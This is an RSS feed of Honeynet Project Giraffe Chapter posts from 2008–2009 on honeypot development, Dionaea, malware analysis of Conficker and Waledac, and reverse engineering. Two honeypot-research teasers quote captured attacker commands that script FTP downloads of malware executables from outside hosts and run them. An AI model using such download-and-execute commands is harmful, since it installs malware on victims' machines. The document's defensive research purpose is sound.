<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xml:base="http://honeynet.org" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
 <title>Giraffe Chapter</title>
 <link>http://honeynet.org/chapters/giraffe</link>
 <description>Giraffe Chapter - led by Markus Koetter, we are development orientend honeynet chapter; Research Focus: low interaction, emulation, reverse enginee</description>
 <language>en</language>
<item>
 <title>RE-Google in action - screenshot</title>
 <link>http://honeynet.org/node/496</link>
 <description>&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <pubDate>Sun, 15 Nov 2009 17:49:33 -0500</pubDate>
 <dc:creator>felix.leder</dc:creator>
 <guid isPermaLink="false">496 at http://honeynet.org</guid>
</item>
<item>
 <title>RE-Google - or how Grandma started Reverse Engineering</title>
 <link>http://honeynet.org/node/493</link>
 <description>Some people say &quot;Reverse Engineering is an art&quot;. Well, this might be true if you consider stuff like mathematics as art. It is more an application of standard methods that evolve constantly. Actually, everybody can learn these methods and start to RE executables. With the &lt;a href=&quot;http://regoogle.carnivore.it&quot;&gt;RE-Google&lt;/a&gt; plugin for IDA Pro, even your granny can start reversing :)
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/112">beginner</category>
 <category domain="http://honeynet.org/taxonomy/term/30">google</category>
 <category domain="http://honeynet.org/taxonomy/term/110">re-google</category>
 <category domain="http://honeynet.org/taxonomy/term/108">reverse engineering</category>
 <category domain="http://honeynet.org/taxonomy/term/109">reversing</category>
 <pubDate>Sun, 15 Nov 2009 17:20:07 -0500</pubDate>
 <dc:creator>felix.leder</dc:creator>
 <guid isPermaLink="false">493 at http://honeynet.org</guid>
</item>
<item>
 <title>Iteolih: RPC vulnerability implementation party</title>
 <link>http://honeynet.org/node/488</link>
 <description>&lt;p&gt;The &lt;a title=&quot;dionaea homepage&quot; href=&quot;http://dionaea.carnivore.it/&quot;&gt;Dionaea&lt;/a&gt; honeypot got more and more mature during the last weeks. As Markus blogged in &lt;a title=&quot;Markus&#039; blog&quot; href=&quot;https://www.honeynet.org/node/485&quot;&gt;Iteolih: Miles and More&lt;/a&gt; the software is now able to detect shellcode via libemu and generates a nice shellcode profile out of this.&lt;/p&gt;

&lt;p&gt;The SMB / DCERPC implementation also got fairly mature and is now able to cope with all packet types and also most caveats and differences of implementations in exploits. As I registered more and more RPC vulnerabilities in the module, it was definitely time to give libemu something to eat! :)&lt;/p&gt;

&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description>
 <group domain="http://honeynet.org/gsoc/project10" xmlns="http://drupal.org/project/og">GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots</group>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/107">Iteolih Samba DCERPC Python libemu</category>
 <pubDate>Tue, 25 Aug 2009 12:33:00 -0400</pubDate>
 <dc:creator>mark.schloesser</dc:creator>
 <guid isPermaLink="false">488 at http://honeynet.org</guid>
</item>
<item>
 <title>Iteolih: Miles and More</title>
 <link>http://honeynet.org/node/485</link>
 <description>&lt;p&gt;We got a new milestone due:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;10.08.2009&lt;/strong&gt;
&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;thread-pool works&lt;/li&gt;
&lt;li&gt;stream recording works&lt;/li&gt;
&lt;li&gt;shellcode detection using libemu works&lt;/li&gt;
&lt;li&gt;shellcode emulation using libemu works&lt;/li&gt;
&lt;li&gt;compiles on linux&amp;amp;openbsd&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
An exploit taken from a public repository, run against the software, is detected and emulated.&lt;/p&gt;
&lt;p&gt;To shorten things, basically all required points are hit with current svn.&lt;/p&gt;
&lt;p&gt;So, given the time we just saved, some words about how it works.&lt;/p&gt;&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/gsoc/project10&quot; class=&quot;og_links&quot;&gt;GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <group domain="http://honeynet.org/gsoc/project10" xmlns="http://drupal.org/project/og">GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots</group>
 <category domain="http://honeynet.org/taxonomy/term/65">Iteolih</category>
 <pubDate>Tue, 11 Aug 2009 08:10:33 -0400</pubDate>
 <dc:creator>markus.koetter</dc:creator>
 <guid isPermaLink="false">485 at http://honeynet.org</guid>
</item>
<item>
 <title>Iteolih: malicious ftp services</title>
 <link>http://honeynet.org/node/470</link>
 <description>&lt;p&gt;Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this:
&lt;/p&gt;
&lt;pre style=&quot;padding-left: 30px;&quot;&gt;&lt;strong&gt;WinExec(&quot;cmd /c echo open 78.1.96.200 4871 &amp;gt; o&amp;amp;echo user 1 1 &amp;gt;&amp;gt; o &amp;amp;echo get msq16.exe &amp;gt;&amp;gt; o&quot;)
ExitThread(0)&lt;/strong&gt;&lt;br /&gt;&lt;/pre&gt;
&lt;p&gt;
As the required part to download the malware to the remotehost was incomplete, I got curious and wanted a copy.
&lt;/p&gt;&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/gsoc/project10&quot; class=&quot;og_links&quot;&gt;GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <group domain="http://honeynet.org/gsoc/project10" xmlns="http://drupal.org/project/og">GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots</group>
 <category domain="http://honeynet.org/taxonomy/term/65">Iteolih</category>
 <pubDate>Sun, 26 Jul 2009 09:28:13 -0400</pubDate>
 <dc:creator>markus.koetter</dc:creator>
 <guid isPermaLink="false">470 at http://honeynet.org</guid>
</item>
<item>
 <title>Iteolih: If you can&#039;t touch it ...</title>
 <link>http://honeynet.org/node/466</link>
 <description>While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.
&lt;code&gt;
cmd /c echo open v1.usbupdatestrings.at 4356 &gt; i&amp;echo user ik ik &gt;&gt; i &amp;echo binary &gt;&gt; i &amp;echo get Ms07.exe &gt;&gt; i &amp;echo quit &gt;&gt; i &amp;ftp -n -s:i &amp;Ms07.exe
&lt;/code&gt;&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/gsoc/project10&quot; class=&quot;og_links&quot;&gt;GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <group domain="http://honeynet.org/gsoc/project10" xmlns="http://drupal.org/project/og">GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots</group>
 <category domain="http://honeynet.org/taxonomy/term/93">ftp</category>
 <category domain="http://honeynet.org/taxonomy/term/65">Iteolih</category>
 <pubDate>Tue, 21 Jul 2009 09:17:48 -0400</pubDate>
 <dc:creator>markus.koetter</dc:creator>
 <guid isPermaLink="false">466 at http://honeynet.org</guid>
</item>
<item>
 <title>Iteolih: SMB/RPC efforts</title>
 <link>http://honeynet.org/node/463</link>
 <description>&lt;p&gt;During the last weeks I have been working on SMB and specifically DCERPC support for the &lt;a title=&quot;dionaea homepage&quot; href=&quot;http://dionaea.carnivore.it/&quot;&gt;Dionaea&lt;/a&gt; next generation low-interaction honeypot (buzz!).&lt;/p&gt;

&lt;p&gt;SMB / CIFS is a huge protocol with several protocol versions and a lot of message types. The &lt;a href=&quot;http://www.snia.org/tech_activities/CIFS/&quot;&gt;CIFS technical reference&lt;/a&gt; and the &lt;a href=&quot;http://ubiqx.org/cifs/&quot;&gt;Implementing CIFS&lt;/a&gt; book have been constant companions for me since the beginning of the project.&lt;/p&gt;&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description>
 <group domain="http://honeynet.org/gsoc/project10" xmlns="http://drupal.org/project/og">GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots</group>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/92">Iteolih Samba DCERPC Python</category>
 <pubDate>Sat, 11 Jul 2009 11:23:49 -0400</pubDate>
 <dc:creator>mark.schloesser</dc:creator>
 <guid isPermaLink="false">463 at http://honeynet.org</guid>
</item>
<item>
 <title>Conficker.A going down?</title>
 <link>http://honeynet.org/node/461</link>
 <description>&lt;p&gt;&lt;a href=&quot;/papers/conficker&quot; target=&quot;_blank&quot;&gt;Conficker&lt;/a&gt; contains a piece of code that has been object of speculation: It does not infect boxes located in the Ukraine. Before sending an exploit, it performs a lookup against Maxmind&#039;s GeoIP database, which is freely available, and skips the host if the returned country code is UA. While the B variant comes with a copy of the database embedded, the A variant downloads the file from Maxmind&#039;s server. A couple of days ago Felix had the idea to deliver a specially crafted database that maps every IP address to the Ukrain.&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/39">conficker</category>
 <pubDate>Fri, 10 Jul 2009 17:51:17 -0400</pubDate>
 <dc:creator>tillmann.werner</dc:creator>
 <guid isPermaLink="false">461 at http://honeynet.org</guid>
</item>
<item>
 <title>nebula - Client library and revised signature segment selection</title>
 <link>http://honeynet.org/node/440</link>
 <description>&lt;p&gt;&lt;a title=&quot;HPSoc Project Description&quot; href=&quot;/gsoc/project11&quot; target=&quot;_self&quot;&gt; &lt;/a&gt;&lt;img src=&quot;http://nebula.carnivore.it/nebula.png&quot; alt=&quot;nebula Logo&quot; width=&quot;100&quot; height=&quot;76&quot; /&gt;&lt;a title=&quot;HPSoc Project Description&quot; href=&quot;/gsoc/project11&quot; target=&quot;_self&quot;&gt;    One project&lt;/a&gt; mentored by the Honeynet Project during GSoC aims at improving &lt;a title=&quot;nebula - An Intrusion Signature Generator&quot; href=&quot;http://nebula.carnivore.it&quot; target=&quot;_self&quot;&gt;nebula&lt;/a&gt;, an automated intrusion signature generator. There are two critical components in the signature generator: A clustering engine that groups similar attacks into classes, and a signature assembler that extracts common features and selects some of them for the actual signature.&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description>
 <group domain="http://honeynet.org/gsoc/project11" xmlns="http://drupal.org/project/og">GSoC Project #11 - Automatic generation of IDS signatures from honeynet data (Nebula)</group>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/44">gsoc</category>
 <category domain="http://honeynet.org/taxonomy/term/68">HPSoC</category>
 <category domain="http://honeynet.org/taxonomy/term/67">nebula</category>
 <pubDate>Mon,  8 Jun 2009 04:58:59 -0400</pubDate>
 <dc:creator>tillmann.werner</dc:creator>
 <guid isPermaLink="false">440 at http://honeynet.org</guid>
</item>
<item>
 <title>Iteolih: Is this worth your time?</title>
 <link>http://honeynet.org/node/437</link>
 <description>&lt;p&gt;Hello,&lt;/p&gt;
&lt;p&gt;due to the length of the whole term &lt;em&gt;Improving the effectiveness of low interaction honeypots&lt;/em&gt;&lt;strong&gt;,&lt;/strong&gt; I decided to use &lt;strong&gt;Iteolih&lt;/strong&gt; as uniq abbrevitation. Things are rolling for the project, writing &lt;a title=&quot;dionaea homepage&quot; href=&quot;http://svn.carnivore.it/browser/dionaea/trunk&quot;&gt;code&lt;/a&gt; started, a basic &lt;a href=&quot;http://dionaea.carnivore.it/&quot;&gt;homepage&lt;/a&gt; with instructions how to compile/use it was created.&lt;/p&gt;
&lt;p&gt;I even had the plan to write about it once or twice, finish something in the code, write about it. When I was done with the code, I got the idea, writing about it was not worth your time. &lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/gsoc/project10&quot; class=&quot;og_links&quot;&gt;GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <group domain="http://honeynet.org/gsoc/project10" xmlns="http://drupal.org/project/og">GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots</group>
 <category domain="http://honeynet.org/taxonomy/term/65">Iteolih</category>
 <pubDate>Fri,  5 Jun 2009 18:37:36 -0400</pubDate>
 <dc:creator>markus.koetter</dc:creator>
 <guid isPermaLink="false">437 at http://honeynet.org</guid>
</item>
<item>
 <title>Iteolih: Python Benchmark</title>
 <link>http://honeynet.org/node/426</link>
 <description>&lt;p&gt;As the plan is to embedd python as scripting language into the honeypot, I ran a benchmark on a testsuite. The &#039;testsuite&#039; is a c core which accepts connections, and allows python to deal with the input. The protocol used for benchmarking is http, the service serves a non static html page.&lt;/p&gt;
&lt;p&gt;I tested &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;2.6.2_(release26-maint,_Apr_19_2009,_02:15:38)&lt;/li&gt;
&lt;li&gt;3.0.1+_(r301:69556,_Apr_15_2009,_17:22:45)_&lt;/li&gt;
&lt;li&gt;3.1a1+_(py3k,_Mar_30_2009,_02:02:26)_&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To benchmark, I ran the apache benchmark tool &lt;strong&gt;ab&lt;/strong&gt;&lt;/p&gt;&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description>
 <group domain="http://honeynet.org/gsoc/project10" xmlns="http://drupal.org/project/og">GSoC Project #10 - Develop and Improve the effectiveness of low Interaction Honeypots</group>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/65">Iteolih</category>
 <category domain="http://honeynet.org/taxonomy/term/56">python</category>
 <pubDate>Sun, 24 May 2009 12:57:02 -0400</pubDate>
 <dc:creator>markus.koetter</dc:creator>
 <guid isPermaLink="false">426 at http://honeynet.org</guid>
</item>
<item>
 <title>A view on Conficker&#039;s inside</title>
 <link>http://honeynet.org/node/402</link>
 <description>&lt;p&gt;Many people have asked us, how Conficker looks like. That&#039;s a tough question for something that&#039;s hidden and tries to be as stealthy as possible. The last time somebody asked me: &quot;Can you show me Conficker?&quot;, I decided to visualize Conficker. Here is &lt;a title=&quot;Conficker.C video&quot; href=&quot;http://iv.cs.uni-bonn.de/uploads/media/video.avi&quot; target=&quot;_blank&quot;&gt;a little video that shows the evil core of Conficker.C&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt; &lt;/p&gt;&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/39">conficker</category>
 <category domain="http://honeynet.org/taxonomy/term/51">control flow</category>
 <category domain="http://honeynet.org/taxonomy/term/52">dependencies</category>
 <category domain="http://honeynet.org/taxonomy/term/50">malware</category>
 <category domain="http://honeynet.org/taxonomy/term/25">visualization</category>
 <pubDate>Fri, 24 Apr 2009 12:47:20 -0400</pubDate>
 <dc:creator>felix.leder</dc:creator>
 <guid isPermaLink="false">402 at http://honeynet.org</guid>
</item>
<item>
 <title>Speaking Waledac</title>
 <link>http://honeynet.org/node/348</link>
 <description>&lt;p&gt;While it seems to be impossible to say whether waledac is the successor of storm or not, what we &lt;em&gt;can&lt;/em&gt; do is take a look at the traffic encryption. They guys over at Shadowserver have already &lt;a href=&quot;http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081231&quot;&gt;blogged some details&lt;/a&gt; about this. We at the &lt;a href=&quot;/chapters/giraffe&quot;&gt;Giraffe Chapter&lt;/a&gt; investigated waledac&#039;s communication protocol further. Here are our results.&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/27">botnet protocols</category>
 <category domain="http://honeynet.org/taxonomy/term/28">encrypted traffic</category>
 <category domain="http://honeynet.org/taxonomy/term/26">encryption</category>
 <category domain="http://honeynet.org/taxonomy/term/21">Waledac</category>
 <pubDate>Tue, 27 Jan 2009 16:33:50 -0500</pubDate>
 <dc:creator>felix.leder</dc:creator>
 <guid isPermaLink="false">348 at http://honeynet.org</guid>
</item>
<item>
 <title>Giraffe Chapter - Status Report 2008</title>
 <link>http://honeynet.org/node/331</link>
 <description>&lt;p&gt;&lt;strong&gt;ORGANIZATION&lt;/strong&gt;&lt;br /&gt;
This year, Felix Leder and Mark Schlösser joined our team. We are focused on active development of honeypot tools and for us writing code is a passion. The Giraffe Chapter now consists of the following people:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt; &lt;em&gt;Paul Bächer&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Markus Kötter&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Felix Leder&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Mark Schlösser&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Tillmann Werner&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Georg Wicherski&lt;/em&gt;&lt;/li&gt;
&lt;p&gt;&lt;em&gt;&lt;/em&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;DEPLOYMENTS&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/node/331&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <pubDate>Sat,  3 Jan 2009 22:22:38 -0500</pubDate>
 <dc:creator>markus.koetter</dc:creator>
 <guid isPermaLink="false">331 at http://honeynet.org</guid>
</item>
<item>
 <title>Waledac is wishing merry christmas</title>
 <link>http://honeynet.org/node/325</link>
 <description>&lt;p&gt;&lt;strong&gt;Waledac is wishing merry christmas&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;There is a new bot in town. It&#039;s called Waledac. The way it is spreading reminds a lot of people of the good old storm botnet: An email is sent containing a &quot;christmas card&quot; in form of the executable &quot;postcard.exe&quot;.&lt;/p&gt;
&lt;p&gt;[image:324 size=thumbnail]&lt;/p&gt;
&lt;p&gt;A preliminary view on the binary has been given by the &lt;a href=&quot;http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081231&quot;&gt;Shadowserver guys (Steve Adair)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt; &lt;/p&gt;
&lt;p&gt;I had the chance to have a first look at the binary (MD5 ccddda141a19d693ad9cb206f2ae0de9) and want to note down some of my few findings to let the hunt begin.&lt;/p&gt;

&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/21">Waledac</category>
 <pubDate>Fri,  2 Jan 2009 02:16:19 -0500</pubDate>
 <dc:creator>felix.leder</dc:creator>
 <guid isPermaLink="false">325 at http://honeynet.org</guid>
</item>
<item>
 <title>ipv6 local-link scope is a mess</title>
 <link>http://honeynet.org/node/251</link>
 <description>&lt;p&gt;I&#039;ve been looking on &lt;a href=&quot;http://en.wikipedia.org/wiki/IPv6&quot;&gt;ipv6&lt;/a&gt; lately, and even though I got a global /64 for free from he.net, I&#039;m not that amused about ipv6 yet.&lt;/p&gt;&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <category domain="http://honeynet.org/taxonomy/term/10">ipv6</category>
 <category domain="http://honeynet.org/taxonomy/term/11">link-local</category>
 <pubDate>Mon, 20 Oct 2008 12:30:22 -0400</pubDate>
 <dc:creator>markus.koetter</dc:creator>
 <guid isPermaLink="false">251 at http://honeynet.org</guid>
</item>
<item>
 <title>No more emulation!</title>
 <link>http://honeynet.org/node/214</link>
 <description>Emulation is an important technology in honeypots and honeynets. It&#039;s not always what we want, though, and here&#039;s why. As you might know, most bots perform attacks in multiple stages, i.e., they
&lt;ul&gt;
&lt;li&gt;send some exploit code to the victim that opens a shell,&lt;/li&gt;
&lt;li&gt;connect to that shell or let the shell connect back,&lt;/li&gt;
&lt;li&gt;invoke commands to download the actual malware binary,&lt;/li&gt;
&lt;li&gt;execute the malware.&lt;/li&gt;
&lt;/ul&gt;
Catching the exploit and providing a fake shell isn&#039;t too hard, as shown in &lt;a href=&quot;http://honeytrap.mwcollect.org/whatfor&quot;&gt;this post&lt;/a&gt;. But we certainly don&#039;t want a malware to get executed on our honeypot, not even in an emulated environment. Instead, we want to do different things with it, e.g., submit it to a central service for automated analysis.&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/giraffe&quot; class=&quot;og_links&quot;&gt;Giraffe Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <pubDate>Wed, 27 Aug 2008 16:05:09 -0400</pubDate>
 <dc:creator>tillmann.werner</dc:creator>
 <guid isPermaLink="false">214 at http://honeynet.org</guid>
</item>
<item>
 <title>About The Honeynet Project</title>
 <link>http://honeynet.org/about</link>
 <description>&lt;p&gt;Founded in 1999, The Honeynet Project is an international, non-profit (501c3) research organization dedicated to improving the security of the Internet at no cost to the public. With Chapters around the world, our volunteers are firmly committed to the ideals of OpenSource. Our goal, simply put, is to make a difference. We accomplish this goal in the following three ways.  &lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;og_rss_groups&quot;&gt;&lt;ul class=&quot;links&quot;&gt;&lt;li  class=&quot;first last og_links&quot;&gt;&lt;a href=&quot;/chapters/chicago&quot; class=&quot;og_links&quot;&gt;Chicago  Chapter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://honeynet.org/about&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;</description>
 <group domain="http://honeynet.org/chapters/westpoint" xmlns="http://drupal.org/project/og">West Point Chapter</group>
 <group domain="http://honeynet.org/chapters/uncc" xmlns="http://drupal.org/project/og">UNCC Chapter</group>
 <group domain="http://honeynet.org/chapters/unam" xmlns="http://drupal.org/project/og">UNAM Chapter</group>
 <group domain="http://honeynet.org/chapters/uk" xmlns="http://drupal.org/project/og">UK Chapter</group>
 <group domain="http://honeynet.org/chapters/taiwan" xmlns="http://drupal.org/project/og">Taiwan Chapter</group>
 <group domain="http://honeynet.org/chapters/spartandevils" xmlns="http://drupal.org/project/og">Spartan Devils Chapter</group>
 <group domain="http://honeynet.org/chapters/spain" xmlns="http://drupal.org/project/og">Spanish Chapter</group>
 <group domain="http://honeynet.org/chapters/singapore" xmlns="http://drupal.org/project/og">Singapore Chapter</group>
 <group domain="http://honeynet.org/chapters/portugal" xmlns="http://drupal.org/project/og">Portuguese Chapter</group>
 <group domain="http://honeynet.org/chapters/philippines" xmlns="http://drupal.org/project/og">Philippines Chapter</group>
 <group domain="http://honeynet.org/chapters/pakistan" xmlns="http://drupal.org/project/og">Pakistan Chapter</group>
 <group domain="http://honeynet.org/chapters/orangecounty" xmlns="http://drupal.org/project/og">Orange County  Chapter</group>
 <group domain="http://honeynet.org/chapters/norway" xmlns="http://drupal.org/project/og">Norwegian Chapter</group>
 <group domain="http://honeynet.org/chapters/newzealand" xmlns="http://drupal.org/project/og">New Zealand Chapter</group>
 <group domain="http://honeynet.org/chapters/mexico" xmlns="http://drupal.org/project/og">Mexican Chapter</group>
 <group domain="http://honeynet.org/chapters/malaysia" xmlns="http://drupal.org/project/og">Malaysian Chapter</group>
 <group domain="http://honeynet.org/chapters/hongkong" xmlns="http://drupal.org/project/og">Hong Kong Chapter</group>
 <group domain="http://honeynet.org/chapters/hawaii" xmlns="http://drupal.org/project/og">Hawaiin Chapter</group>
 <group domain="http://honeynet.org/chapters/global" xmlns="http://drupal.org/project/og">Global Chapter</group>
 <group domain="http://honeynet.org/chapters/giraffe" xmlns="http://drupal.org/project/og">Giraffe Chapter</group>
 <group domain="http://honeynet.org/chapters/germany" xmlns="http://drupal.org/project/og">German Chapter</group>
 <group domain="http://honeynet.org/chapters/france" xmlns="http://drupal.org/project/og">French  Chapter</group>
 <group domain="http://honeynet.org/chapters/czech" xmlns="http://drupal.org/project/og">Czech Chapter</group>
 <group domain="http://honeynet.org/chapters/malaysia2" xmlns="http://drupal.org/project/og">CyberSecurity Malaysia Chapter</group>
 <group domain="http://honeynet.org/chapters/china" xmlns="http://drupal.org/project/og">Chinese  Chapter</group>
 <group domain="http://honeynet.org/chapters/canada" xmlns="http://drupal.org/project/og">Canadian Chapter</group>
 <group domain="http://honeynet.org/chapters/brazil" xmlns="http://drupal.org/project/og">Brazilian  Chapter</group>
 <group domain="http://honeynet.org/chapters/australia" xmlns="http://drupal.org/project/og">Australian  Chapter</group>
